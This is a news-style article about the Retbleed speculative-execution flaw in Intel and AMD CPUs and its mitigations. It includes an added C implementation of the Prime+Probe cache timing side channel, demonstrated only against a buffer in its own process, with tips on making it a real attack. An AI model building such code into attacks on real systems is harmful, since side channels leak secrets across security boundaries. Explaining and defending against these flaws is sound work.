- Researchers at ETH Zurich discovered a serious speculative execution attack against Intel and AMD microprocessors, affecting Linux systems that run on the affected chips.
- Retbleed targets a safeguard known as retpoline. A retpoline sequence controls how the CPU speculates when executing indirect “jmp” and “call” instructions.
- The attack abuses speculative execution: the CPU predicts the target of the next instruction and executes it before the prediction is confirmed.
Researchers at ETH Zurich have uncovered a serious hardware vulnerability in some Intel and AMD microprocessors, affecting Linux systems that run on the affected chips. The attack bypasses current system defenses and can be used to extract sensitive information. It is named Retbleed because it targets a software defense known as retpoline.
Retbleed abuses the CPU's prediction of the next instruction
Retpoline was introduced in 2018 to mitigate the harmful effects of speculative execution attacks, including one known as Spectre. Spectre exploits the CPU's branch prediction: when the CPU encounters a direct or indirect branch, it predicts the address of the next instruction and speculatively executes it before the prediction is confirmed. Retbleed shows that, on the affected CPUs, return instructions can be mispredicted in the same way, which is how it gets around retpoline.
According to the researchers, mitigating Retbleed demands extensive changes to the system and results in performance loss on affected AMD and Intel CPUs. The researchers describe one method of leaking information from CPU caches (the technique known as Prime+Probe) as follows:
“The spy first fills up an entire cache set with their own memory. They then trigger, or wait for, some victim activity to occur that might be significant for the given cache set. In the last step, the spy then reloads their own memory while measuring the access time. If the access time is above a computed threshold, the spy infers that the cache set was populated with the victim’s memory, which consequentially evicted some of the spy’s memory from the cache.”
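The three steps quoted above (prime the set, wait for the victim, probe and compare against a threshold) in working C. This is an added illustration written for this article, not the ETH researchers' code. It assumes 64-byte cache lines, an 8-way target set whose lines lie 4 KiB apart, and a portable clock_gettime timer instead of rdtsc, so individual measurements are noisy and the threshold is calibrated at runtime from probes taken with no victim activity; the "victim" is a second buffer in the same process that touches the same set.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#define LINE      64     /* assumed cache-line size */
#define WAYS      8      /* assumed associativity of the target set */
#define STRIDE    4096   /* assumed distance between lines that share a set index */
#define SAMPLES   32     /* quiet probes used to calibrate the threshold */
#define MARGIN_NS 40     /* slack added above the quiet-case median (assumption) */

static volatile uint8_t sink;   /* keeps the loads from being optimised away */

static uint64_t now_ns(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
}

/* STRIDE-aligned region holding WAYS lines for every set index. */
static uint8_t *alloc_arena(void) {
    uint8_t *raw = malloc((size_t)WAYS * STRIDE + STRIDE);
    if (!raw) { perror("malloc"); exit(1); }
    uintptr_t p = ((uintptr_t)raw + STRIDE - 1) & ~(uintptr_t)(STRIDE - 1);
    memset((uint8_t *)p, 1, (size_t)WAYS * STRIDE);
    return (uint8_t *)p;
}

/* Step 1 (prime): touch every spy line that maps to `set`, so the set holds only spy data. */
static void prime(uint8_t *arena, int set) {
    for (int w = 0; w < WAYS; w++)
        sink = arena[(size_t)w * STRIDE + (size_t)set * LINE];
}

/* Step 3 (probe): reload the same lines and return how long the reload took. */
static uint64_t probe(uint8_t *arena, int set) {
    uint64_t t0 = now_ns();
    for (int w = 0; w < WAYS; w++)
        sink = arena[(size_t)w * STRIDE + (size_t)set * LINE];
    return now_ns() - t0;
}

static int cmp_u64(const void *a, const void *b) {
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Threshold = median probe time with no victim activity, plus a margin. */
uint64_t compute_threshold(const uint64_t *quiet, size_t n, uint64_t margin) {
    uint64_t *tmp = malloc(n * sizeof *tmp);
    memcpy(tmp, quiet, n * sizeof *tmp);
    qsort(tmp, n, sizeof *tmp, cmp_u64);
    uint64_t median = tmp[n / 2];
    free(tmp);
    return median + margin;
}

/* The inference in the quote: a slow reload means the victim evicted spy lines. */
int infer_victim_access(uint64_t probe_ns, uint64_t threshold_ns) {
    return probe_ns > threshold_ns;
}

/* How many probes in a trace are classified as victim activity on the set. */
size_t count_evictions(const uint64_t *trace, size_t n, uint64_t threshold_ns) {
    size_t hits = 0;
    for (size_t i = 0; i < n; i++)
        hits += (size_t)infer_victim_access(trace[i], threshold_ns);
    return hits;
}

int main(void) {
    uint8_t *spy = alloc_arena();
    uint8_t *victim = alloc_arena();   /* stands in for the victim's memory, same set index */
    int set = 17;
    uint64_t quiet[SAMPLES];
    for (int i = 0; i < SAMPLES; i++) { prime(spy, set); quiet[i] = probe(spy, set); }
    uint64_t thr = compute_threshold(quiet, SAMPLES, MARGIN_NS);

    prime(spy, set);
    for (int w = 0; w < WAYS; w++)   /* step 2: victim activity that lands in the same set */
        sink = victim[(size_t)w * STRIDE + (size_t)set * LINE];
    uint64_t t = probe(spy, set);
    printf("threshold %llu ns, probe %llu ns -> %s\n",
           (unsigned long long)thr, (unsigned long long)t,
           infer_victim_access(t, thr) ? "victim touched the set" : "no eviction seen");
    return 0;
}
```

With a nanosecond timer a single probe is too coarse to be reliable; a real attack would use rdtsc and repeat the measurement many times, which is what `count_evictions` over a trace is for. The threshold calibration is the part that decides false positives and false negatives, and the margin is a tuning knob, not a constant the page gives.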
The issue is tracked as CVE-2022-29900 (AMD) and CVE-2022-29901 (Intel) and was reported to both companies. Intel published a security advisory urging users to use Indirect Branch Restricted Speculation (IBRS) instead of retpoline in response to the vulnerability. AMD also issued guidance recommending either IBRS mode or retpoline as mitigations. On Linux, a patched kernel reports which mitigation it is using in /sys/devices/system/cpu/vulnerabilities/retbleed.
For this study, the academics built an analysis framework on top of Linux kernel testing and tracing facilities and developed a proof of concept (PoC) for Linux. The researchers also published a video showing Retbleed leaking kernel memory on Intel and AMD processors.